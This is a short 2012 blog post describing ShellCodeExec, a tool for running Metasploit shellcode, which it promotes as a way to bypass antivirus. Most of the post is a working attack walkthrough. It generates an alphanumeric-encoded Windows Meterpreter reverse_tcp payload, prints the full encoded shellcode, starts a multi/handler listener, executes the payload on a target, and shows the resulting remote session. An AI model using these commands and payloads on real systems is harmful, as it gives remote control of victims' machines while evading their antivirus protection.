Friday, June 22, 2012

Execute Metasploit Payloads using ShellCodeExec


According to Damel Bernardo’s Blog, this is another good way to bypass any antivirus protection.
Let’s see how it works!
Features
  • Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
  • Can be compiled and works on 32-bit and 64-bit architectures.
  • As far as I know, no AV detect it as malicious.
  • Works in DEP/NX-enabled environments: it allocates the memory page where it stores the shellcode as +rwx – Readable Writable and eXecutable.
  • It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit’s msfpayload) to Metasploit’s msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode.
  • Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours.
Example
1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Windows target:
Code:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
 
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA
2. Execute the Metasploit multi/handler listener on your machine. For example for a Windows target:
Code:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example on the Windows target:
Code:
C:\WINDOWS\Temp>shellcodeexec.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlKXNiEPEPC0CPMYIuTqN2E4LKV2P0NkCbTLLKQBEDNkQbGXTOLwCzEvP1IoTqIPNLGLCQQlERTlEpIQZoVmEQO7KRZPPRQGNkCbTPLKRbElEQZpNkCpQhLEIPQdPJGqZpPPLKQXR8NkQHEpGqN3M3ElG9LKP4NkEQZvP1KOEaO0LlO1ZoTMEQIWVXM0QeKDTCCML8EkQmEtPuIrV8LKQHEtC1KcE6NkVlRkNkRxELC1ICLKETNkGqN0MYRdQ4VDQKCkCQPYCjCaIoKPV8CoPZLKR2ZKMVCmQxVSGBC0EPRHCGPsP2QORtCXPLCGEvEWIoZuX8LPGqEPGpQ9ITCdV0CXEyMPPkC0IoKeRpV0RpPPCpPPG0RpPhIzTOIOKPKOKeLWRJEUPhKpNHMXVaRHVbC0R1ClMYM6PjTPCfV7E8NyI5PtQqKOIEMUKpT4TLIoPNVhCEXlRHXpOEI2PVIoZuQzGpRJGtV6QGQxC2IIZhQOKON5LKP6PjCpCXEPVpC0EPPVCZEPQxV8OTCcM5IoN5LSPSPjEPQFCcV7CXC2KiIXQOIoZuC1KsVIO6OuZVCEXlISAA
If you head back to the terminal where the multi/handler is running you will happily see:
Code:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUhread LPORT=4444 LHOST=192.168.136.1 E
[*] Please wait while we load the module tree...
 
[...]
 
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 673 exploits - 354 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12306 updated 7 days ago (2011.04.07)
 
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 4444
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:4444 -> 192.168.136.129:1581) at Thu Apr 14 15:30:15 +0100 2011
 
meterpreter > sysinfo
System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
The tool along with compilation files for POSIX and Windows systems can be found athttps://github.com/inquisb/shellcodeexec.

No comments:

Post a Comment